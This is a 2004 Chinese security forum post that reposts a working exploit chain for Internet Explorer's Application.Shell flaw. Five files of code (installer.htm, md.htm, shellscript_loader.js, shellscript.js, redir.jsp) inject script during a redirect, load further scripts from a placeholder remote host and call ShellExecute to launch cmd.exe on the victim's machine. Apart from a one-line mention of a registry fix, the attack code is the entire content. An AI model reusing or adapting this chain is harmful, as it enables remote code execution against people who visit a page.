Microsoft Internet Explorer Remote Application.Shell Exploit

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6819
精华: 834
积分: 36070
阅读权限: 255
性别: 男
来自: 中国
在线时间: 586 小时
注册时间: 2004-6-25
最后登录: 2008-9-6

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-9-30 15:19 只看该作者

Microsoft Internet Explorer Remote Application.Shell Exploit

文章作者：Jelmer

Solution : The IEFix.reg registry file will protect you from this new variant/exploit
----------------------------------------------------- installer.htm -------------------------------------------------------

复制内容到剪贴板

代码:

<html>

<body>

<script language="Javascript">

function InjectedDuringRedirection(){

showModalDialog(&#39;md.htm&#39;,window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;

dialogWidth:1\;").location="vbscript:\"<SCRIPT SRC=&#39;[url]http://ip/shellscript_loader.js[/url]&#39;><\/script>\"";

}

</script>

<script language="javascript">



setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);

setTimeout("myiframe.execScript(&#39;InjectedDuringRedirection()&#39;) ",101);

document.write(&#39;<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" style=display:none;></IFRAME>&#39;);



</script>

</body>

</html>

--------------------------------------------------------- md.htm ---------------------------------------------------------

复制内容到剪贴板

代码:

<SCRIPT language="javascript">



window.returnValue = window.dialogArguments;



function CheckStatus(){



try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}



setTimeout("CheckStatus()",100);



}



CheckStatus();



</SCRIPT>

--------------------------------------------------- shellscript_loader.js ---------------------------------------------------

复制内容到剪贴板

代码:

function getRealShell() {



myiframe.document.write("<SCRIPT SRC=&#39;[url]http://ip/shellscript.js[/url]&#39;><\/SCRIPT>");



}



document.write("<IFRAME ID=myiframe SRC=&#39;about:blank&#39; WIDTH=200 HEIGHT=200></IFRAME>");



setTimeout("getRealShell()",100);

------------------------------------------------------- shellscript.js -------------------------------------------------------

复制内容到剪贴板

代码:

function injectIt() {



document.frames[0].document.body.insertAdjacentHTML(&#39;afterBegin&#39;,&#39;injected<script language=



"JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</script>&#39;);



}



document.write(&#39;<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>&#39;);



setTimeout("injectIt()", 1000);

--------------------------------------------------------- redir.jsp ----------------------------------------------------------

复制内容到剪贴板

代码:

<% Thread.sleep(1500);



response.setStatus(302);



response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm"); 



%>

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Microsoft Internet Explorer Remote Application.Shell Exploit